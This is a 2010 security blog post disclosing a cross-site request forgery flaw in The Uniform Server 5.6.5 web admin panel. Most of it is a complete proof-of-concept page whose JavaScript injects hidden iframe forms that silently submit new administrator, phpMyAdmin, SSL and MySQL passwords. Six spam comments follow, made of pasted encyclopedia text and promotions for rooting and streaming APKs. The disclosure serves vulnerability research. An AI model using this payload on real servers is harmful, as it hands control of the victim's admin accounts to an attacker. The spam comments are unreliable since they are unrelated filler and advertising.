This site is soon to be deprecated by http://www.johnleitch.net

Saturday, May 15, 2010

The Uniform Server 5.6.5 XSRF

A cross-site request forgery vunlerability in The Uniform Server 5.6.5 web UI can be exploited to change various administrative passwords.

PoC:
<html>
<head>
<script type="text/javascript">
window.onload = function() {
var url = 'http://localhost/apanel';

var xsrs = [
{
"action": url + "/apsetup.php",
"method": "post",
"submitCall": "document.forms[0].submit.click()",
"fields": [
{ "name": "apuser", "value": "new_username" },
{ "name": "appass", "value": "new_password" },
{ "name": "submit", "value": "Change", "type": "submit" }
]
},
{
"action": url + "/psetup.php",
"method": "post",
"submitCall": "document.forms[0].submit.click()",
"fields": [
{ "name": "puser", "value": "new_username" },
{ "name": "ppass", "value": "new_password" },
{ "name": "submit", "value": "Change", "type": "submit" }
]
},
{
"action": url + "/sslpsetup.php",
"method": "post",
"submitCall": "document.forms[0].submit.click()",
"fields": [
{ "name": "puser", "value": "new_username" },
{ "name": "ppass", "value": "new_password" },
{ "name": "submit", "value": "Change", "type": "submit" }
]
},
{
"action": url + "/mqsetup.php",
"method": "post",
"submitCall": "document.forms[0].submit.click()",
"fields": [
{ "name": "qpass", "value": "new_password" },
{ "name": "submit", "value": "Change", "type": "submit" }
]
}
];

for (var x = 0; x < xsrs.length; x++) {
var attackFrame = document.createElement('iframe');

var html = '<html><body><form action="' + xsrs[x].action + '" ' +
'method="' + xsrs[x].method + '">';

for (var y = 0; y < xsrs[x].fields.length; y++) {
html += '<input type="' +
(xsrs[x].fields[y].type != null ?
xsrs[x].fields[y].type : 'hidden') + '" ' +
'name="' + xsrs[x].fields[y].name + '" ' +
'value="' + xsrs[x].fields[y].value + '" />';
}

html += '</form><script>' + xsrs[x].submitCall + '\x3c/script></body></html>';

document.body.appendChild(attackFrame);

attackFrame.contentDocument.write(html);
}
}
</script>
</head>
<body>
</body>
</html>

7 comments:

  1. The Guildhall cost between £400–£500 to build.[15] (As it was built primarily using pressed labour, modern equivalents of the building costs are virtually meaningless. The annual income of the city council at the time the Guildhall was built was around £120.[15]) The eastern face of the Guildhall was built in a distinctive black and white checked design, representing the exchequer.
    cake topper
    Catering Atlanta

    ReplyDelete
  2. The ten outfield players may be arranged in any combination. The number of players in each position determines the style of the team's play; more forwards and fewer defenders creates a more aggressive and offensive-minded game, while the reverse creates a slower, more defensive style of play. While players typically spend most of the game in a specific position, there are few restrictions on player movement, and players can switch positions at any time.[14] The layout of a team's players is known as a formation. Defining the team's formation and tactics is usually the prerogative of the team's manager.
    cash advances
    custom website development

    ReplyDelete
  3. In this world, Indian cuisines are one of the most diverse; they are famous for their distinct and flavorful spices. There are around 80 cookies spices and pepper, fenugreek, turmeric, fennel, chili, ginger, clove, celery, cardamom, cumin, cassia and others. There are various methodology and techniques by which spices are grown.

    persian rugs
    hvac repair nyc

    ReplyDelete
  4. Different regions have water with different mineral components. As a result, different regions are better suited to making certain types of beer.

    on hold players
    non profit fundraiser

    ReplyDelete
  5. Baidu Root was mixcloud.com launched in China, but this app More Info has a English version so if Install Baidu Root on PC you don't understand Chinese you do not have Baidu Root APK to stress over how you can utilize Baidu Root it and you will certainly give root access.

    ReplyDelete
  6. more right from your Android mobile totally free.Mobdro Presently, Mobdro library has video clips to Refer captivate the people. You can Mobdro APK either stream these videos online.

    ReplyDelete